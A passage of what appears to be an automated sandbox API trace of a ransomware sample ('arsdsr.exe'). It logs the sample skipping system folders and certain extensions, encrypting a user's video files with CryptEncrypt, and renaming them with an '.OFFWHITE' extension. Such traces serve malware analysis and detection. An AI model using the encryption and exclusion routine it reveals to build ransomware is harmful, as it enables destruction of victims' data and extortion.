lpString2="KERNEL32.DLL") returned -1 [0140.033] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0140.033] SystemFunction036 (in: RandomBuffer=0x531578, RandomBufferLength=0x10 | out: RandomBuffer=0x531578) returned 1 [0140.033] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0140.033] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0140.033] SystemFunction036 (in: RandomBuffer=0x5315a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5315a8) returned 1 [0140.033] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0140.033] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0140.033] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525120*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x525120*, pdwDataLen=0x295e310*=0x100) returned 1 [0140.034] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0140.034] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0140.034] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525228*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x525228*, pdwDataLen=0x295e30c*=0x100) returned 1 [0140.034] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x6cbd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.034] SetLastError (dwErrCode=0x0) [0140.034] WriteFile (in: hFile=0xb0, lpBuffer=0x525120*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x525120*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0140.086] GetLastError () returned 0x0 [0140.086] GetLastError () returned 0x0 [0140.086] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x6dbd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.086] WriteFile (in: hFile=0xb0, lpBuffer=0x525228*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x525228*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0140.087] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x6ebd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.087] WriteFile (in: hFile=0xb0, lpBuffer=0x522160*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x522160*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0140.087] GetProcessHeap () returned 0x500000 [0140.087] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x6cbd) returned 0x55a7b8 [0140.087] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.087] ReadFile (in: hFile=0xb0, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x6cbd, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295e540*=0x6cbd, lpOverlapped=0x0) returned 1 [0140.089] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.089] WriteFile (in: hFile=0xb0, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x6cbd, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295e54c*=0x6cbd, lpOverlapped=0x0) returned 1 [0140.090] GetProcessHeap () returned 0x500000 [0140.090] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0140.090] CloseHandle (hObject=0xb0) returned 1 [0140.091] GetProcessHeap () returned 0x500000 [0140.091] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525120 | out: hHeap=0x500000) returned 1 [0140.091] GetProcessHeap () returned 0x500000 [0140.092] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525228 | out: hHeap=0x500000) returned 1 [0140.092] GetProcessHeap () returned 0x500000 [0140.092] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x531578 | out: hHeap=0x500000) returned 1 [0140.092] GetProcessHeap () returned 0x500000 [0140.092] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5315a8 | out: hHeap=0x500000) returned 1 [0140.092] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\OUMBCbqQCQxoqlxRj.avi" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\OUMBCbqQCQxoqlxRj.avi") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\OUMBCbqQCQxoqlxRj.avi" [0140.092] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\OUMBCbqQCQxoqlxRj.avi", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\OUMBCbqQCQxoqlxRj.avi.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\OUMBCbqQCQxoqlxRj.avi.OFFWHITE" [0140.092] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\OUMBCbqQCQxoqlxRj.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\oumbcbqqcqxoqlxrj.avi"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\OUMBCbqQCQxoqlxRj.avi.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\oumbcbqqcqxoqlxrj.avi.offwhite")) returned 1 [0140.093] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5e6be190, ftCreationTime.dwHighDateTime=0x1d5e5d9, ftLastAccessTime.dwLowDateTime=0x7f147e60, ftLastAccessTime.dwHighDateTime=0x1d5dcf7, ftLastWriteTime.dwLowDateTime=0x7f147e60, ftLastWriteTime.dwHighDateTime=0x1d5dcf7, nFileSizeHigh=0x0, nFileSizeLow=0x3099, dwReserved0=0xb05818e0, dwReserved1=0x8909b951, cFileName="p1bx.flv", cAlternateFileName="")) returned 1 [0140.093] lstrcmpiW (lpString1="p1bx.flv", lpString2=".") returned 1 [0140.093] lstrcmpiW (lpString1="p1bx.flv", lpString2="..") returned 1 [0140.093] lstrcmpiW (lpString1="p1bx.flv", lpString2="...") returned 1 [0140.093] lstrcmpiW (lpString1="p1bx.flv", lpString2="windows") returned -1 [0140.093] lstrcmpiW (lpString1="p1bx.flv", lpString2="$recycle.bin") returned 1 [0140.093] lstrcmpiW (lpString1="p1bx.flv", lpString2="rsa") returned -1 [0140.093] lstrcmpiW (lpString1="p1bx.flv", lpString2="ntuser.dat") returned 1 [0140.093] lstrcmpiW (lpString1="p1bx.flv", lpString2="programdata") returned -1 [0140.093] lstrcmpiW (lpString1="p1bx.flv", lpString2="appdata") returned 1 [0140.093] lstrcmpiW (lpString1="p1bx.flv", lpString2="program files") returned -1 [0140.093] lstrcmpiW (lpString1="p1bx.flv", lpString2="program files (x86)") returned -1 [0140.093] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0140.093] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="p1bx.flv" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\p1bx.flv") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\p1bx.flv" [0140.093] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0140.093] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0140.093] PathFindExtensionW (pszPath="p1bx.flv") returned=".flv" [0140.094] lstrcmpiW (lpString1=".flv", lpString2=".exe") returned 1 [0140.094] lstrcmpiW (lpString1=".flv", lpString2=".log") returned -1 [0140.094] lstrcmpiW (lpString1=".flv", lpString2=".cab") returned 1 [0140.094] lstrcmpiW (lpString1=".flv", lpString2=".cmd") returned 1 [0140.094] lstrcmpiW (lpString1=".flv", lpString2=".com") returned 1 [0140.094] lstrcmpiW (lpString1=".flv", lpString2=".cpl") returned 1 [0140.094] lstrcmpiW (lpString1=".flv", lpString2=".ini") returned -1 [0140.094] lstrcmpiW (lpString1=".flv", lpString2=".dll") returned 1 [0140.094] lstrcmpiW (lpString1=".flv", lpString2=".url") returned -1 [0140.094] lstrcmpiW (lpString1=".flv", lpString2=".ttf") returned -1 [0140.094] lstrcmpiW (lpString1=".flv", lpString2=".mp3") returned -1 [0140.094] lstrcmpiW (lpString1=".flv", lpString2=".pif") returned -1 [0140.094] lstrcmpiW (lpString1=".flv", lpString2=".mp4") returned -1 [0140.094] lstrcmpiW (lpString1=".flv", lpString2=".OFFWHITE") returned -1 [0140.094] lstrcmpiW (lpString1=".flv", lpString2=".msi") returned -1 [0140.094] lstrcmpiW (lpString1="p1bx.flv", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0140.094] GetProcessHeap () returned 0x500000 [0140.094] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x522170 [0140.094] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\p1bx.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p1bx.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0140.095] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=12441) returned 1 [0140.095] GetProcessHeap () returned 0x500000 [0140.095] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5315a8 [0140.095] GetProcessHeap () returned 0x500000 [0140.095] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x531578 [0140.095] GetProcessHeap () returned 0x500000 [0140.095] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525228 [0140.095] GetProcessHeap () returned 0x500000 [0140.095] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525120 [0140.095] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0140.095] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0140.095] SystemFunction036 (in: RandomBuffer=0x5315a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5315a8) returned 1 [0140.095] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0140.095] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0140.095] SystemFunction036 (in: RandomBuffer=0x531578, RandomBufferLength=0x10 | out: RandomBuffer=0x531578) returned 1 [0140.095] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0140.095] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0140.095] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525228*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x525228*, pdwDataLen=0x295e310*=0x100) returned 1 [0140.097] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0140.097] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0140.097] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525120*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x525120*, pdwDataLen=0x295e30c*=0x100) returned 1 [0140.097] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x3099, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.097] SetLastError (dwErrCode=0x0) [0140.097] WriteFile (in: hFile=0xb0, lpBuffer=0x525228*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x525228*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0140.099] GetLastError () returned 0x0 [0140.099] GetLastError () returned 0x0 [0140.099] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x3199, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.100] WriteFile (in: hFile=0xb0, lpBuffer=0x525120*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x525120*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0140.100] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x3299, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.100] WriteFile (in: hFile=0xb0, lpBuffer=0x522170*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x522170*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0140.100] GetProcessHeap () returned 0x500000 [0140.100] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x3099) returned 0x55a7b8 [0140.100] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.100] ReadFile (in: hFile=0xb0, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x3099, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295e540*=0x3099, lpOverlapped=0x0) returned 1 [0140.102] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.102] WriteFile (in: hFile=0xb0, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x3099, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295e54c*=0x3099, lpOverlapped=0x0) returned 1 [0140.102] GetProcessHeap () returned 0x500000 [0140.102] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0140.102] CloseHandle (hObject=0xb0) returned 1 [0140.103] GetProcessHeap () returned 0x500000 [0140.103] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525228 | out: hHeap=0x500000) returned 1 [0140.103] GetProcessHeap () returned 0x500000 [0140.103] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525120 | out: hHeap=0x500000) returned 1 [0140.103] GetProcessHeap () returned 0x500000 [0140.103] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5315a8 | out: hHeap=0x500000) returned 1 [0140.103] GetProcessHeap () returned 0x500000 [0140.103] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x531578 | out: hHeap=0x500000) returned 1 [0140.103] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\p1bx.flv" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\p1bx.flv") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\p1bx.flv" [0140.104] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\p1bx.flv", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\p1bx.flv.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\p1bx.flv.OFFWHITE" [0140.104] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\p1bx.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p1bx.flv"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\p1bx.flv.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p1bx.flv.offwhite")) returned 1 [0140.104] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0363a80, ftCreationTime.dwHighDateTime=0x1d5d841, ftLastAccessTime.dwLowDateTime=0x3c01f0a0, ftLastAccessTime.dwHighDateTime=0x1d5e7b3, ftLastWriteTime.dwLowDateTime=0x3c01f0a0, ftLastWriteTime.dwHighDateTime=0x1d5e7b3, nFileSizeHigh=0x0, nFileSizeLow=0x158a8, dwReserved0=0xb05818e0, dwReserved1=0x8909b951, cFileName="s0rbk04L68y5WVLpbqKf.mkv", cAlternateFileName="S0RBK0~1.MKV")) returned 1 [0140.104] lstrcmpiW (lpString1="s0rbk04L68y5WVLpbqKf.mkv", lpString2=".") returned 1 [0140.105] lstrcmpiW (lpString1="s0rbk04L68y5WVLpbqKf.mkv", lpString2="..") returned 1 [0140.105] lstrcmpiW (lpString1="s0rbk04L68y5WVLpbqKf.mkv", lpString2="...") returned 1 [0140.105] lstrcmpiW (lpString1="s0rbk04L68y5WVLpbqKf.mkv", lpString2="windows") returned -1 [0140.105] lstrcmpiW (lpString1="s0rbk04L68y5WVLpbqKf.mkv", lpString2="$recycle.bin") returned 1 [0140.105] lstrcmpiW (lpString1="s0rbk04L68y5WVLpbqKf.mkv", lpString2="rsa") returned 1 [0140.105] lstrcmpiW (lpString1="s0rbk04L68y5WVLpbqKf.mkv", lpString2="ntuser.dat") returned 1 [0140.105] lstrcmpiW (lpString1="s0rbk04L68y5WVLpbqKf.mkv", lpString2="programdata") returned 1 [0140.105] lstrcmpiW (lpString1="s0rbk04L68y5WVLpbqKf.mkv", lpString2="appdata") returned 1 [0140.105] lstrcmpiW (lpString1="s0rbk04L68y5WVLpbqKf.mkv", lpString2="program files") returned 1 [0140.105] lstrcmpiW (lpString1="s0rbk04L68y5WVLpbqKf.mkv", lpString2="program files (x86)") returned 1 [0140.105] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0140.105] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="s0rbk04L68y5WVLpbqKf.mkv" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\s0rbk04L68y5WVLpbqKf.mkv") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\s0rbk04L68y5WVLpbqKf.mkv" [0140.105] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0140.105] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0140.105] PathFindExtensionW (pszPath="s0rbk04L68y5WVLpbqKf.mkv") returned=".mkv" [0140.105] lstrcmpiW (lpString1=".mkv", lpString2=".exe") returned 1 [0140.105] lstrcmpiW (lpString1=".mkv", lpString2=".log") returned 1 [0140.105] lstrcmpiW (lpString1=".mkv", lpString2=".cab") returned 1 [0140.105] lstrcmpiW (lpString1=".mkv", lpString2=".cmd") returned 1 [0140.105] lstrcmpiW (lpString1=".mkv", lpString2=".com") returned 1 [0140.105] lstrcmpiW (lpString1=".mkv", lpString2=".cpl") returned 1 [0140.105] lstrcmpiW (lpString1=".mkv", lpString2=".ini") returned 1 [0140.105] lstrcmpiW (lpString1=".mkv", lpString2=".dll") returned 1 [0140.105] lstrcmpiW (lpString1=".mkv", lpString2=".url") returned -1 [0140.105] lstrcmpiW (lpString1=".mkv", lpString2=".ttf") returned -1 [0140.105] lstrcmpiW (lpString1=".mkv", lpString2=".mp3") returned -1 [0140.106] lstrcmpiW (lpString1=".mkv", lpString2=".pif") returned -1 [0140.106] lstrcmpiW (lpString1=".mkv", lpString2=".mp4") returned -1 [0140.106] lstrcmpiW (lpString1=".mkv", lpString2=".OFFWHITE") returned -1 [0140.106] lstrcmpiW (lpString1=".mkv", lpString2=".msi") returned -1 [0140.106] lstrcmpiW (lpString1="s0rbk04L68y5WVLpbqKf.mkv", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0140.106] GetProcessHeap () returned 0x500000 [0140.106] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x522180 [0140.106] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\s0rbk04L68y5WVLpbqKf.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\s0rbk04l68y5wvlpbqkf.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0140.106] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=88232) returned 1 [0140.106] GetProcessHeap () returned 0x500000 [0140.106] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x531578 [0140.106] GetProcessHeap () returned 0x500000 [0140.106] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5315a8 [0140.106] GetProcessHeap () returned 0x500000 [0140.106] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525120 [0140.106] GetProcessHeap () returned 0x500000 [0140.106] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525228 [0140.106] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0140.107] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0140.107] SystemFunction036 (in: RandomBuffer=0x531578, RandomBufferLength=0x10 | out: RandomBuffer=0x531578) returned 1 [0140.107] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0140.107] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0140.107] SystemFunction036 (in: RandomBuffer=0x5315a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5315a8) returned 1 [0140.107] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0140.107] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0140.107] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525120*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x525120*, pdwDataLen=0x295e310*=0x100) returned 1 [0140.107] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0140.107] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0140.107] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525228*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x525228*, pdwDataLen=0x295e30c*=0x100) returned 1 [0140.107] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x158a8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.107] SetLastError (dwErrCode=0x0) [0140.108] WriteFile (in: hFile=0xb0, lpBuffer=0x525120*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x525120*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0140.132] GetLastError () returned 0x0 [0140.132] GetLastError () returned 0x0 [0140.132] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x159a8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.132] WriteFile (in: hFile=0xb0, lpBuffer=0x525228*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x525228*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0140.132] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x15aa8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.132] WriteFile (in: hFile=0xb0, lpBuffer=0x522180*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x522180*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0140.132] GetProcessHeap () returned 0x500000 [0140.132] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x158a8) returned 0x55a7b8 [0140.132] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.132] ReadFile (in: hFile=0xb0, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x158a8, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295e540*=0x158a8, lpOverlapped=0x0) returned 1 [0140.137] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.137] WriteFile (in: hFile=0xb0, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x158a8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295e54c*=0x158a8, lpOverlapped=0x0) returned 1 [0140.137] GetProcessHeap () returned 0x500000 [0140.137] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0140.137] CloseHandle (hObject=0xb0) returned 1 [0140.140] GetProcessHeap () returned 0x500000 [0140.140] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525120 | out: hHeap=0x500000) returned 1 [0140.140] GetProcessHeap () returned 0x500000 [0140.140] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525228 | out: hHeap=0x500000) returned 1 [0140.140] GetProcessHeap () returned 0x500000 [0140.140] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x531578 | out: hHeap=0x500000) returned 1 [0140.140] GetProcessHeap () returned 0x500000 [0140.140] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5315a8 | out: hHeap=0x500000) returned 1 [0140.140] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\s0rbk04L68y5WVLpbqKf.mkv" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\s0rbk04L68y5WVLpbqKf.mkv") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\s0rbk04L68y5WVLpbqKf.mkv" [0140.140] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\s0rbk04L68y5WVLpbqKf.mkv", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\s0rbk04L68y5WVLpbqKf.mkv.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\s0rbk04L68y5WVLpbqKf.mkv.OFFWHITE" [0140.140] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\s0rbk04L68y5WVLpbqKf.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\s0rbk04l68y5wvlpbqkf.mkv"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\s0rbk04L68y5WVLpbqKf.mkv.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\s0rbk04l68y5wvlpbqkf.mkv.offwhite")) returned 1 [0140.141] FindNextFileW (in: hFindFile=0x544610, 